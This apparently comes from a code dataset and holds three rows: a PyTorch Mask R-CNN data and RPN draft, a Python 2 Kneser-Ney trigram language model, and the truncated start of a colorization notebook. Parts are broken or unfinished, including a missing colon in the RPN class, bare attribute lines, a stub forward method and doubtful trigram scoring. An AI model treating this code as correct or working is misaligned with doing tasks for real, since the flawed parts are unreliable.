for i, v in enumerate(gt_hist):
logger.debug(
'{:d}{:s}: {:d}'.format(
i, classes[i].rjust(char_len), v))
logger.debug('-' * char_len)
logger.debug(
'{:s}: {:d}'.format(
'total'.rjust(char_len), np.sum(gt_hist)))
def _unmap(self, data, count, inds, fill=0):
"""Unmap a subset of item (data) back to the original set of items (of
size count)"""
if count == len(inds):
return data
if len(data.shape) == 1:
ret = np.empty((count, ), dtype=data.dtype)
ret.fill(fill)
ret[inds] = data
else:
ret = np.empty((count, ) + data.shape[1:], dtype=data.dtype)
ret.fill(fill)
ret[inds, :] = data
return ret
def _is_valid(self, rawdata):
# Valid images have:
# (1) At least one foreground RoI OR
# (2) At least one background RoI
overlaps = rawdata['max_overlaps']
# find boxes with sufficient overlap
fg_inds = np.where(overlaps >= CONFIG.TRAIN.FG_THRESH)[0]
# Select background RoIs as those within [BG_THRESH_LO, BG_THRESH_HI)
bg_inds = np.where((overlaps < CONFIG.TRAIN.BG_THRESH_HI) &
(overlaps >= CONFIG.TRAIN.BG_THRESH_LO))[0]
# image is only valid if such boxes exist
valid = len(fg_inds) > 0 or len(bg_inds) > 0
return valid
def _flip(self, rawdata):
width = rawdata['width']
boxes = rawdata['boxes'].copy()
oldx1 = boxes[:, 0].copy()
oldx2 = boxes[:, 2].copy()
boxes[:, 0] = width - oldx2 - 1
boxes[:, 2] = width - oldx1 - 1
assert (boxes[:, 2] >= boxes[:, 0]).all()
rawdata['boxes'] = boxes
rawdata['segms'] = self.flip_segms(
rawdata['segms'], rawdata['height'], rawdata['width']
)
rawdata['flipped'] = True
def _add_class_assignments(self, rawdata):
"""Compute object category assignment for each box associated with each
roidb entry.
"""
gt_overlaps = rawdata['gt_overlaps'].toarray()
# max overlap with gt over classes (columns)
max_overlaps = gt_overlaps.max(axis=1)
# gt class that had the max overlap
max_classes = gt_overlaps.argmax(axis=1)
rawdata['max_classes'] = max_classes
rawdata['max_overlaps'] = max_overlaps
# sanity checks
# if max overlap is 0, the class must be background (class 0)
zero_inds = np.where(max_overlaps == 0)[0]
assert all(max_classes[zero_inds] == 0)
# if max overlap > 0, the class must be a fg class (not class 0)
nonzero_inds = np.where(max_overlaps > 0)[0]
assert all(max_classes[nonzero_inds] != 0)
def _add_gt_annotations(self, rawdata):
ann_ids = self.COCO.getAnnIds(imgIds=rawdata['id'], iscrowd=None)
objs = self.COCO.loadAnns(ann_ids)
# Sanitize bboxes -- some are invalid
valid_objs = []
valid_segms = []
width = rawdata['width']
height = rawdata['height']
for obj in objs:
# crowd regions are RLE encoded and stored as dicts
if isinstance(obj['segmentation'], list):
# Valid polygons have >= 3 points, so require >= 6 coordinates
obj['segmentation'] = [
p for p in obj['segmentation'] if len(p) >= 6
]
if obj['area'] < CONFIG.TRAIN.GT_MIN_AREA:
continue
if 'ignore' in obj and obj['ignore'] == 1:
continue
# Convert form (x1, y1, w, h) to (x1, y1, x2, y2)
x1, y1, x2, y2 = xywh_to_xyxy(obj['bbox'])
x1, y1, x2, y2 = self.clip_xyxy_to_image(
x1, y1, x2, y2, height, width
)
# Require non-zero seg area and more than 1x1 box size
if obj['area'] > 0 and x2 > x1 and y2 > y1:
obj['clean_bbox'] = [x1, y1, x2, y2]
valid_objs.append(obj)
valid_segms.append(obj['segmentation'])
num_valid_objs = len(valid_objs)
boxes = np.zeros((num_valid_objs, 4), dtype=rawdata['boxes'].dtype)
gt_classes = np.zeros((num_valid_objs), dtype=rawdata['gt_classes'].dtype)
gt_overlaps = np.zeros(
(num_valid_objs, self.num_classes),
dtype=rawdata['gt_overlaps'].dtype
)
seg_areas = np.zeros((num_valid_objs), dtype=rawdata['seg_areas'].dtype)
is_crowd = np.zeros((num_valid_objs), dtype=rawdata['is_crowd'].dtype)
box_to_gt_ind_map = np.zeros(
(num_valid_objs), dtype=rawdata['box_to_gt_ind_map'].dtype
)
for ix, obj in enumerate(valid_objs):
cls = self.json_category_id_to_contiguous_id[obj['category_id']]
boxes[ix, :] = obj['clean_bbox']
gt_classes[ix] = cls
seg_areas[ix] = obj['area']
is_crowd[ix] = obj['iscrowd']
box_to_gt_ind_map[ix] = ix
if obj['iscrowd']:
# Set overlap to -1 for all classes for crowd objects
# so they will be excluded during training
gt_overlaps[ix, :] = -1.0
else:
gt_overlaps[ix, cls] = 1.0
rawdata['boxes'] = np.append(rawdata['boxes'], boxes, axis=0)
rawdata['segms'].extend(valid_segms)
rawdata['gt_classes'] = np.append(rawdata['gt_classes'], gt_classes)
rawdata['seg_areas'] = np.append(rawdata['seg_areas'], seg_areas)
rawdata['gt_overlaps'] = np.append(
rawdata['gt_overlaps'].toarray(), gt_overlaps, axis=0
)
rawdata['gt_overlaps'] = scipy.sparse.csr_matrix(rawdata['gt_overlaps'])
rawdata['is_crowd'] = np.append(rawdata['is_crowd'], is_crowd)
rawdata['box_to_gt_ind_map'] = np.append(
rawdata['box_to_gt_ind_map'], box_to_gt_ind_map
)
def flip_segms(self, segms, height, width):
"""Left/right flip each mask in a list of masks."""
def _flip_poly(poly, width):
flipped_poly = np.array(poly)
flipped_poly[0::2] = width - np.array(poly[0::2]) - 1
return flipped_poly.tolist()
def _flip_rle(rle, height, width):
if 'counts' in rle and type(rle['counts']) == list:
# Magic RLE format handling painfully discovered by looking at the
# COCO API showAnns function.
rle = mask_util.frPyObjects([rle], height, width)
mask = mask_util.decode(rle)
mask = mask[:, ::-1, :]
rle = mask_util.encode(np.array(mask, order='F', dtype=np.uint8))
return rle
flipped_segms = []
for segm in segms:
if type(segm) == list:
# Polygon format
flipped_segms.append([_flip_poly(poly, width) for poly in segm])
else:
# RLE format
assert type(segm) == dict
flipped_segms.append(_flip_rle(segm, height, width))
return flipped_segms
def clip_xyxy_to_image(self, x1, y1, x2, y2, height, width):
"""Clip coordinates to an image with the given height and width."""
x1 = np.minimum(width - 1., np.maximum(0., x1))
y1 = np.minimum(height - 1., np.maximum(0., y1))
x2 = np.minimum(width - 1., np.maximum(0., x2))
y2 = np.minimum(height - 1., np.maximum(0., y2))
return x1, y1, x2, y2
####################################################################################################
# Network Model
####################################################################################################
from resnetXtFPN import resnet50C4
class GenerateProposalLabelsOp(nn.Module):
def __init__(self):
super().__init__()
def forward(self, rpn_rois, roidb, im_info):
"""Op for generating training labels for RPN proposals. This is used
when training RPN jointly with Fast/Mask R-CNN (as in end-to-end
Faster R-CNN training).
blobs_in:
- 'rpn_rois': 2D tensor of RPN proposals output by GenerateProposals
- 'roidb': roidb entries that will be labeled
- 'im_info': See GenerateProposals doc.
blobs_out:
- (variable set of blobs): returns whatever blobs are required for
training the model. It does this by querying the data loader for
the list of blobs that are needed.
"""
im_scales = im_info.data.numpy()[:, 2]
# get_fast_rcnn_blob_names()
output_blob_names = ['rois',
'labels_int32', 'bbox_targets', 'bbox_inside_weights', 'bbox_outside_weights',
'mask_rois', 'roi_has_mask_int32', 'masks_int32']
# For historical consistency with the original Faster R-CNN
# implementation we are *not* filtering crowd proposals.
# This choice should be investigated in the future (it likely does
# not matter).
# Note: crowd_thresh=0 will ignore _filter_crowd_proposals
self.add_proposals(roidb, rpn_rois, im_scales, crowd_thresh=0)
blobs = {k: [] for k in output_blob_names}
self.add_fast_rcnn_blobs(blobs, im_scales, roidb)
return blobs
def add_fast_rcnn_blobs(self, blobs, im_scales, roidb):
"""Add blobs needed for training Fast R-CNN style models."""
# Sample training RoIs from each image and append them to the blob lists
for im_i, entry in enumerate(roidb):
frcn_blobs = self._sample_rois(entry, im_scales[im_i], im_i)
for k, v in frcn_blobs.items():
blobs[k].append(v)
# Concat the training blob lists into tensors
for k, v in blobs.items():
if isinstance(v, list) and len(v) > 0:
blobs[k] = np.concatenate(v)
# Perform any final work and validity checks after the collating blobs for
# all minibatch images
valid = True
return valid
def _sample_rois(self, roidb, im_scale, batch_idx):
"""Generate a random sample of RoIs comprising foreground and background
examples.
"""
rois_per_image = int(CONFIG.TRAIN.BATCH_SIZE_PER_IM)
fg_rois_per_image = int(np.round(CONFIG.TRAIN.FG_FRACTION * rois_per_image))
max_overlaps = roidb['max_overlaps']
# Select foreground RoIs as those with >= FG_THRESH overlap
fg_inds = np.where(max_overlaps >= CONFIG.TRAIN.FG_THRESH)[0]
# Guard against the case when an image has fewer than fg_rois_per_image
# foreground RoIs
fg_rois_per_this_image = np.minimum(fg_rois_per_image, fg_inds.size)
# Sample foreground regions without replacement
if fg_inds.size > 0:
fg_inds = npr.choice(
fg_inds, size=fg_rois_per_this_image, replace=False)
# Select background RoIs as those within [BG_THRESH_LO, BG_THRESH_HI)
bg_inds = np.where((max_overlaps < CONFIG.TRAIN.BG_THRESH_HI) &
(max_overlaps >= CONFIG.TRAIN.BG_THRESH_LO))[0]
# Compute number of background RoIs to take from this image (guarding
# against there being fewer than desired)
bg_rois_per_this_image = rois_per_image - fg_rois_per_this_image
bg_rois_per_this_image = np.minimum(bg_rois_per_this_image, bg_inds.size)
# Sample foreground regions without replacement
if bg_inds.size > 0:
bg_inds = np.random.choice(
bg_inds, size=bg_rois_per_this_image, replace=False)
# The indices that we're selecting (both fg and bg)
keep_inds = np.append(fg_inds, bg_inds)
# Label is the class each RoI has max overlap with
sampled_labels = roidb['max_classes'][keep_inds]
sampled_labels[fg_rois_per_this_image:] = 0 # Label bg RoIs with class 0
sampled_boxes = roidb['boxes'][keep_inds]
if 'bbox_targets' not in roidb:
gt_inds = np.where(roidb['gt_classes'] > 0)[0]
gt_boxes = roidb['boxes'][gt_inds, :]
gt_assignments = gt_inds[roidb['box_to_gt_ind_map'][keep_inds]]
bbox_targets = compute_targets(
sampled_boxes, gt_boxes[gt_assignments, :], sampled_labels)
bbox_targets, bbox_inside_weights = expand_bbox_targets(bbox_targets)
else:
bbox_targets, bbox_inside_weights = expand_bbox_targets(
roidb['bbox_targets'][keep_inds, :])
bbox_outside_weights = np.array(
bbox_inside_weights > 0, dtype=bbox_inside_weights.dtype)
# Scale rois and format as (batch_idx, x1, y1, x2, y2)
sampled_rois = sampled_boxes * im_scale
repeated_batch_idx = batch_idx * np.ones((sampled_rois.shape[0], 1), dtype=np.float32)
sampled_rois = np.hstack((repeated_batch_idx, sampled_rois))
# Base Fast R-CNN blobs
blob_dict = dict(
labels_int32=sampled_labels.astype(np.int32, copy=False),
rois=sampled_rois,
bbox_targets=bbox_targets,
bbox_inside_weights=bbox_inside_weights,
bbox_outside_weights=bbox_outside_weights)
# Optionally add Mask R-CNN blobs
roi_data.mask_rcnn.add_mask_rcnn_blobs(blob_dict, sampled_boxes, roidb,
im_scale, batch_idx)
return blob_dict
def add_proposals(self, roidb, rois, scales, crowd_thresh):
"""Add proposal boxes (rois) to an roidb that has ground-truth annotations
but no proposals. If the proposals are not at the original image scale,
specify the scale factor that separate them in scales.
"""
box_list = []
for i in range(len(roidb)):
inv_im_scale = 1. / scales[i]
idx = np.where(rois[:, 0] == i)[0]
box_list.append(rois[idx, 1:] * inv_im_scale)
self._merge_proposal_boxes_into_roidb(roidb, box_list)
if crowd_thresh > 0:
self._filter_crowd_proposals(roidb, crowd_thresh)
self._add_class_assignments(roidb)
def _merge_proposal_boxes_into_roidb(self, roidb, box_list):
"""Add proposal boxes to each roidb entry."""
assert len(box_list) == len(roidb)
for i, entry in enumerate(roidb):
boxes = box_list[i]
num_boxes = boxes.shape[0]
gt_overlaps = np.zeros(
(num_boxes, entry['gt_overlaps'].shape[1]),
dtype=entry['gt_overlaps'].dtype
)
box_to_gt_ind_map = -np.ones(
(num_boxes), dtype=entry['box_to_gt_ind_map'].dtype
)
# Note: unlike in other places, here we intentionally include all gt
# rois, even ones marked as crowd. Boxes that overlap with crowds will
# be filtered out later (see: _filter_crowd_proposals).
gt_inds = np.where(entry['gt_classes'] > 0)[0]
if len(gt_inds) > 0:
gt_boxes = entry['boxes'][gt_inds, :]
gt_classes = entry['gt_classes'][gt_inds]
proposal_to_gt_overlaps = bbox_overlaps(
boxes.astype(dtype=np.float32, copy=False),
gt_boxes.astype(dtype=np.float32, copy=False)
)
# Gt box that overlaps each input box the most
# (ties are broken arbitrarily by class order)
argmaxes = proposal_to_gt_overlaps.argmax(axis=1)
# Amount of that overlap
maxes = proposal_to_gt_overlaps.max(axis=1)
# Those boxes with non-zero overlap with gt boxes
I = np.where(maxes > 0)[0]
# Record max overlaps with the class of the appropriate gt box
gt_overlaps[I, gt_classes[argmaxes[I]]] = maxes[I]
box_to_gt_ind_map[I] = gt_inds[argmaxes[I]]
entry['boxes'] = np.append(
entry['boxes'],
boxes.astype(entry['boxes'].dtype, copy=False),
axis=0
)
entry['gt_classes'] = np.append(
entry['gt_classes'],
np.zeros((num_boxes), dtype=entry['gt_classes'].dtype)
)
entry['seg_areas'] = np.append(
entry['seg_areas'],
np.zeros((num_boxes), dtype=entry['seg_areas'].dtype)
)
entry['gt_overlaps'] = np.append(
entry['gt_overlaps'].toarray(), gt_overlaps, axis=0
)
entry['gt_overlaps'] = scipy.sparse.csr_matrix(entry['gt_overlaps'])
entry['is_crowd'] = np.append(
entry['is_crowd'],
np.zeros((num_boxes), dtype=entry['is_crowd'].dtype)
)
entry['box_to_gt_ind_map'] = np.append(
entry['box_to_gt_ind_map'],
box_to_gt_ind_map.astype(
entry['box_to_gt_ind_map'].dtype, copy=False
)
)
def _filter_crowd_proposals(self, roidb, crowd_thresh):
"""Finds proposals that are inside crowd regions and marks them as
overlap = -1 with each ground-truth rois, which means they will be excluded
from training.
"""
for entry in roidb:
gt_overlaps = entry['gt_overlaps'].toarray()
crowd_inds = np.where(entry['is_crowd'] == 1)[0]
non_gt_inds = np.where(entry['gt_classes'] == 0)[0]
if len(crowd_inds) == 0 or len(non_gt_inds) == 0:
continue
crowd_boxes = xyxy_to_xywh(entry['boxes'][crowd_inds, :])
non_gt_boxes = xyxy_to_xywh(entry['boxes'][non_gt_inds, :])
iscrowd_flags = [int(True)] * len(crowd_inds)
ious = COCOmask.iou(non_gt_boxes, crowd_boxes, iscrowd_flags)
bad_inds = np.where(ious.max(axis=1) > crowd_thresh)[0]
gt_overlaps[non_gt_inds[bad_inds], :] = -1
entry['gt_overlaps'] = scipy.sparse.csr_matrix(gt_overlaps)
def _add_class_assignments(self, roidb):
"""Compute object category assignment for each box associated with each
roidb entry.
"""
for entry in roidb:
gt_overlaps = entry['gt_overlaps'].toarray()
# max overlap with gt over classes (columns)
max_overlaps = gt_overlaps.max(axis=1)
# gt class that had the max overlap
max_classes = gt_overlaps.argmax(axis=1)
entry['max_classes'] = max_classes
entry['max_overlaps'] = max_overlaps
# sanity checks
# if max overlap is 0, the class must be background (class 0)
zero_inds = np.where(max_overlaps == 0)[0]
assert all(max_classes[zero_inds] == 0)
# if max overlap > 0, the class must be a fg class (not class 0)
nonzero_inds = np.where(max_overlaps > 0)[0]
assert all(max_classes[nonzero_inds] != 0)
class GenerateProposalsOp(nn.Module):
def __init__(self, anchors, spatial_scale):
super().__init__()
self._anchors = anchors
self._num_anchors = self._anchors.shape[0]
self._feat_stride = 1. / spatial_scale
def forward(self, rpn_cls_prob, rpn_bbox_pred, im_info):
"""Op for generating RPN porposals.
blobs_in:
- 'rpn_cls_probs': 4D tensor of shape (N, A, H, W), where N is the
number of minibatch images, A is the number of anchors per
locations, and (H, W) is the spatial size of the prediction grid.
Each value represents a "probability of object" rating in [0, 1].
- 'rpn_bbox_pred': 4D tensor of shape (N, 4 * A, H, W) of predicted
deltas for transformation anchor boxes into RPN proposals.
- 'im_info': 2D tensor of shape (N, 3) where the three columns encode
the input image's [height, width, scale]. Height and width are
for the input to the network, not the original image; scale is the
scale factor used to scale the original image to the network input
size.
blobs_out:
- 'rpn_rois': 2D tensor of shape (R, 5), for R RPN proposals where the
five columns encode [batch ind, x1, y1, x2, y2]. The boxes are
w.r.t. the network input, which is a *scaled* version of the
original image; these proposals must be scaled by 1 / scale (where
scale comes from im_info; see above) to transform it back to the
original input image coordinate system.
- 'rpn_roi_probs': 1D tensor of objectness probability scores
(extracted from rpn_cls_probs; see above).
"""
# 1. for each location i in a (H, W) grid:
# generate A anchor boxes centered on cell i
# apply predicted bbox deltas to each of the A anchors at cell i
# 2. clip predicted boxes to image
# 3. remove predicted boxes with either height or width < threshold
# 4. sort all (proposal, score) pairs by score from highest to lowest
# 5. take the top pre_nms_topN proposals before NMS
# 6. apply NMS with a loose threshold (0.7) to the remaining proposals
# 7. take after_nms_topN proposals after NMS
# 8. return the top proposals
"""Type conversion"""
# predicted probability of fg object for each RPN anchor
scores = rpn_cls_prob.data.cpu().numpy()
# predicted achors transformations
bbox_deltas = rpn_bbox_pred.data.cpu().numpy()
# input image (height, width, scale), in which scale is the scale factor
# applied to the original dataset image to get the network input image
im_info = im_info.data.cpu().numpy()
# 1. Generate proposals from bbox deltas and shifted anchors
height, width = scores.shape[-2:]
# Enumerate all shifted positions on the (H, W) grid
shift_x = np.arange(0, width) * self._feat_stride
shift_y = np.arange(0, height) * self._feat_stride
shift_x, shift_y = np.meshgrid(shift_x, shift_y, copy=False)
# Convert to (K, 4), K=H*W, where the columns are (dx, dy, dx, dy)
# shift pointing to each grid location
shifts = np.vstack((shift_x.ravel(), shift_y.ravel(), shift_x.ravel(),
shift_y.ravel())).transpose()
# Broacast anchors over shifts to enumerate all anchors at all positions
# in the (H, W) grid:
# - add A anchors of shape (1, A, 4) to
# - K shifts of shape (K, 1, 4) to get
# - all shifted anchors of shape (K, A, 4)
# - reshape to (K*A, 4) shifted anchors
num_images = scores.shape[0]
A = self._num_anchors
K = shifts.shape[0]
all_anchors = self._anchors[np.newaxis, :, :] + shifts[:, np.newaxis, :]
all_anchors = all_anchors.reshape((K * A, 4))
# all_anchors = torch.from_numpy(all_anchors).type_as(scores)
rois = np.empty((0, 5), dtype=np.float32)
roi_probs = np.empty((0, 1), dtype=np.float32)
for im_i in range(num_images):
im_i_boxes, im_i_probs = self.proposals_for_one_image(
im_info[im_i, :], all_anchors, bbox_deltas[im_i, :, :, :],
scores[im_i, :, :, :])
batch_inds = im_i * np.ones(
(im_i_boxes.shape[0], 1), dtype=np.float32)
im_i_rois = np.hstack((batch_inds, im_i_boxes))
rois = np.append(rois, im_i_rois, axis=0)
roi_probs = np.append(roi_probs, im_i_probs, axis=0)
return rois, roi_probs # Note: ndarrays
def proposals_for_one_image(self, im_info, all_anchors, bbox_deltas, scores):
# Get mode-dependent configuration
CONFIG_key = 'TRAIN' if self.training else 'TEST'
pre_nms_topN = CONFIG[CONFIG_key].RPN_PRE_NMS_TOP_N
post_nms_topN = CONFIG[CONFIG_key].RPN_POST_NMS_TOP_N
nms_thresh = CONFIG[CONFIG_key].RPN_NMS_THRESH
min_size = CONFIG[CONFIG_key].RPN_MIN_SIZE
# print('generate_proposals:', pre_nms_topN, post_nms_topN, nms_thresh, min_size)
# Transpose and reshape predicted bbox transformations to get them
# into the same order as the anchors:
# - bbox deltas will be (4 * A, H, W) format from conv output
# - transpose to (H, W, 4 * A)
# - reshape to (H * W * A, 4) where rows are ordered by (H, W, A)
# in slowest to fastest order to match the enumerated anchors
bbox_deltas = bbox_deltas.transpose((1, 2, 0)).reshape((-1, 4))
# Same story for the scores:
# - scores are (A, H, W) format from conv output
# - transpose to (H, W, A)
# - reshape to (H * W * A, 1) where rows are ordered by (H, W, A)
# to match the order of anchors and bbox_deltas
scores = scores.transpose((1, 2, 0)).reshape((-1, 1))
# print('pre_nms:', bbox_deltas.shape, scores.shape)
# 4. sort all (proposal, score) pairs by score from highest to lowest
# 5. take top pre_nms_topN (e.g. 6000)
if pre_nms_topN <= 0 or pre_nms_topN >= len(scores):
order = np.argsort(-scores.squeeze())
else:
# Avoid sorting possibly large arrays; First partition to get top K
# unsorted and then sort just those (~20x faster for 200k scores)
inds = np.argpartition(-scores.squeeze(),
pre_nms_topN)[:pre_nms_topN]
order = np.argsort(-scores[inds].squeeze())
order = inds[order]
bbox_deltas = bbox_deltas[order, :]
all_anchors = all_anchors[order, :]
scores = scores[order]
# Transform anchors into proposals via bbox transformations
proposals = bbox_transform(all_anchors, bbox_deltas, (1.0, 1.0, 1.0, 1.0))
# 2. clip proposals to image (may result in proposals with zero area
# that will be removed in the next step)
proposals = self.clip_tiled_boxes(proposals, im_info[:2])
# 3. remove predicted boxes with either height or width < min_size
keep = self._filter_boxes(proposals, min_size, im_info)
proposals = proposals[keep, :]
scores = scores[keep]
# print('pre_nms:', proposals.shape, scores.shape)
# 6. apply loose nms (e.g. threshold = 0.7)
# 7. take after_nms_topN (e.g. 300)
# 8. return the top proposals (-> RoIs top)
if nms_thresh > 0:
keep = nms_gpu(np.hstack((proposals, scores)), nms_thresh)
# print('nms keep:', keep.shape)
if post_nms_topN > 0:
keep = keep[:post_nms_topN]
proposals = proposals[keep, :]
scores = scores[keep]
# print('final proposals:', proposals.shape, scores.shape)
return proposals, scores
def _filter_boxes(self, boxes, min_size, im_info):
"""Only keep boxes with both sides >= min_size and center within the image.
"""
# Scale min_size to match image scale
min_size *= im_info[2]
ws = boxes[:, 2] - boxes[:, 0] + 1
hs = boxes[:, 3] - boxes[:, 1] + 1
x_ctr = boxes[:, 0] + ws / 2.
y_ctr = boxes[:, 1] + hs / 2.
keep = np.where((ws >= min_size) & (hs >= min_size) &
(x_ctr < im_info[1]) & (y_ctr < im_info[0]))[0]
return keep
def _clip_tiled_boxes(self, boxes, im_shape):
"""Clip boxes to image boundaries. im_shape is [height, width] and boxes
has shape (N, 4 * num_tiled_boxes)."""
assert boxes.shape[1] % 4 == 0, \
'boxes.shape[1] is {:d}, but must be divisible by 4.'.format(
boxes.shape[1]
)
# x1 >= 0
boxes[:, 0::4] = np.maximum(np.minimum(boxes[:, 0::4], im_shape[1] - 1), 0)
# y1 >= 0
boxes[:, 1::4] = np.maximum(np.minimum(boxes[:, 1::4], im_shape[0] - 1), 0)
# x2 < im_shape[1]
boxes[:, 2::4] = np.maximum(np.minimum(boxes[:, 2::4], im_shape[1] - 1), 0)
# y2 < im_shape[0]
boxes[:, 3::4] = np.maximum(np.minimum(boxes[:, 3::4], im_shape[0] - 1), 0)
return boxes
class RPN(nn.Module)
def __init__(self, dim_in, spatial_scale, pretrainfile=None):
super(RPN, self).__init__()
self.dim_in = dim_in
self.dim_out = dim_in
spatial_scale = 1.0 / CONFIG.RPN.STRIDE
anchors = generate_anchors(
stride=CONFIG.RPN.STRIDE,
sizes=CONFIG.RPN.SIZES,
aspect_ratios=CONFIG.RPN.ASPECT_RATIOS)
num_anchors = anchors.shape[0]
# RPN hidden representation
self.RPN_conv = nn.Conv2d(self.dim_in, self.dim_out, 3, 1, 1)
# Proposal classification scores
self.n_score_out = num_anchors # for sigmoid.
self.RPN_cls_score = nn.Conv2d(self.dim_out, self.n_score_out, 1, 1, 0)
# Proposal bbox regression deltas
self.RPN_bbox_pred = nn.Conv2d(self.dim_out, num_anchors * 4, 1, 1, 0)
self.RPN_GenerateProposals = GenerateProposalsOp(anchors, spatial_scale)
self.RPN_GenerateProposalLabels = GenerateProposalLabelsOp()
def _init_weights(self):
init.normal_(self.RPN_conv.weight, std=0.01)
init.constant_(self.RPN_conv.bias, 0)
init.normal_(self.RPN_cls_score.weight, std=0.01)
init.constant_(self.RPN_cls_score.bias, 0)
init.normal_(self.RPN_bbox_pred.weight, std=0.01)
init.constant_(self.RPN_bbox_pred.bias, 0)
class MaskRCNN(nn.Module):
def __init__(self, pretrainfile=None):
super(MaskRCNN, self).__init__()
# resnet50C4: stride = 16, outplane = 1024
self.backbone = resnet50C4(pretrained=True, num_classes=None)
self.rpn = RPN(dim_in = 1024, spatial_scale = 1.0 / CONFIG.RPN.STRIDE)
self.proposal_layer
self.roialign_layer
self.head_bbox
self.head_mask
self.init(pretrainfile)
def init(self, pretrainfile=None):
if pretrainfile is None:
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, .1)
m.bias.data.zero_()
else:
self.load_state_dict(torch.load(pretrainfile, map_location=lambda storage, loc: storage))
print ('==> load self-train weights as pretrain.')
def forward(self, input_local, input_global):
pass
def calc_loss(self, pred, gt):
loss = nn.BCEWithLogitsLoss()(pred, gt)
return loss
## main ##
if __name__ == '__main__':
dataset = CocoDataset(CONFIG.DATASET.TRAIN_DIR, CONFIG.DATASET.TRAIN_ANNOFILE)
batch_size = len(CONFIG.SOLVER.GPU_IDS) * CONFIG.SOLVER.IMS_PER_BATCH
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size,
# sampler=sampler,
num_workers=CONFIG.SOLVER.WORKERS,
collate_fn=dataset.collate_minibatch)
for input_data in tqdm(dataloader):
for key in input_data:
if key != 'roidb': # roidb is a list of ndarrays with inconsistent length
input_data[key] = list(map(Variable, input_data[key]))
net_outputs = maskRCNN(**input_data)
# loss = net_outputs['total_loss']
# optimizer.zero_grad()
# loss.backward()
# optimizer.step()
pass |
20,710 | cb62d4c450cfdbf2fcce45ab3ae685f1fc00b6c7 | import math, collections, copy
from nltk.corpus import brown
UNI_BACKOFF_COEFFICIENT = .9
BI_BACKOFF_COEFFICIENT = .95
DISCOUNT = .35
STRIP_CHARS = "<>.\",?! "
class KneserTrigramModel:
"""Kneser-Ney Backoff language model - Implements the Kneser-Ney model
with bigrams and backoffs to laplace unigram if the given bigram does
not exist in the training corpus."""
def __init__(self):
"""Initialize your data structures in the constructor."""
self.bigramCounts = collections.defaultdict(lambda : 0)
self.trigramCounts = collections.defaultdict(lambda : 0)
self.unigramCounts = collections.defaultdict(lambda : 1)
self.continuationCounts = collections.defaultdict(lambda: 0)
self.followingCounts = collections.defaultdict(lambda: 0)
self.total = 1
self.totalBigramCounts = 0
print "Training Language Model..."
self.train(brown.sents())
print "--Training Complete--"
def train(self, corpus):
""" Takes a corpus and trains your language model.
Compute any counts or other corpus statistics in this function.
"""
# TODO your code here
# Tip: To get words from the corpus, try
# for sentence in corpus.corpus:
# for datum in sentence.data:
# word = datum.word
for sentence in corpus:
prevWord = ""
prevPrevWord = ""
for word in sentence:
word = word.strip(STRIP_CHARS)
word = word.lower()
currentWord = word
self.unigramCounts[currentWord] += 1
self.total += 1
if prevWord != "":
if prevPrevWord != "":
trigram = (prevPrevWord, prevWord, currentWord)
if trigram not in self.trigramCounts:
self.continuationCounts[currentWord] += 1
self.followingCounts[(prevPrevWord, prevWord)] += 1
self.trigramCounts[trigram] += 1
self.bigramCounts[(prevWord, currentWord)] += 1
self.totalBigramCounts += 1
else:
self.bigramCounts[(prevWord, currentWord)] += 1
self.totalBigramCounts += 1
prevPrevWord = prevWord
prevWord = currentWord
else:
prevWord = currentWord
self.total += len(self.unigramCounts)
def score(self, sentence):
""" Takes a list of strings as argument and returns the log-probability of the
sentence using your language model. Use whatever data you computed in train() here.
"""
# TODO your code here
score = 0.0
prevWord = ""
prevPrevWord = ""
newSentence = []
for word in sentence:
newSentence += word.split()
for currentWord in sentence:
currentWord = currentWord.strip(STRIP_CHARS)
currentWord = currentWord.lower()
if prevWord != "":
if prevPrevWord != "":
trigram = (prevPrevWord, prevWord, currentWord)
trigramCount = self.trigramCounts[trigram]
if trigramCount > 0:
score += math.log(max(self.trigramCounts[trigram] - DISCOUNT, 0)*len(self.trigramCounts) + DISCOUNT*self.followingCounts[(prevPrevWord, prevWord)]*self.continuationCounts[currentWord])
# Subtraction by 1 removes the add one count from the laplace
# smoothing
score -= math.log((self.bigramCounts[(prevPrevWord, prevWord)]) * len(self.trigramCounts))
elif self.bigramCounts[(prevWord, currentWord)] > 0:
score += math.log(self.bigramCounts[(prevWord, currentWord)]*BI_BACKOFF_COEFFICIENT)
score -= math.log(self.totalBigramCounts)
else:
count = self.unigramCounts[currentWord]
score += math.log(count * UNI_BACKOFF_COEFFICIENT)
score -= math.log(self.total)
else:
prevPrevWord = prevWord
prevWord = currentWord
else:
prevWord = currentWord
return -score
|
20,711 | 607322dc0bdeedb115c742171c379ce32b132ba8 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import cv2
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from tensorflow.keras.applications.inception_resnet_v2 import InceptionResNetV2, decode_predictions, preprocess_input
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import Conv2D, Conv2DTranspose, Reshape, Dense
import tensorflow as tf
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
import os
# print(os.listdir("../input"))
# Any results you write to the current directory are saved as output.
# In[2]:
# modelv2 = InceptionResNetV2( input_shape = (224, 224, 3), weights = "./input/inception_resnet_v2_weights_tf_dim_ordering_tf_kernels.h5")
# import mumpy
images_gray = np.load('./input/l/gray_scale.npy')
images_lab = np.load('./input/ab/ab/ab1.npy')
print(images_gray.shape)
print(images_lab.shape)
# In[3]:
# imgs = np.zeros((1, 224, 224, 3))
# for i in range(0, 3):
# imgs[0, :, :,i] = images_gray[1029]
# temp_img = preprocess_input(imgs)
# prediction = model_simple.predict(temp_img)
# plt.imshow(prediction[0,:,:,])
# In[4]:
def get_rbg_from_lab(gray_imgs, ab_imgs, n = 10):
imgs = np.zeros((n, 224, 224, 3))
imgs[:, :, :, 0] = gray_imgs[0:n:]
imgs[:, :, :, 1:] = ab_imgs[0:n:]
print(ab_imgs[0:n:].shape)
imgs = imgs.astype("uint8")
imgs_ = []
for i in range(0, n):
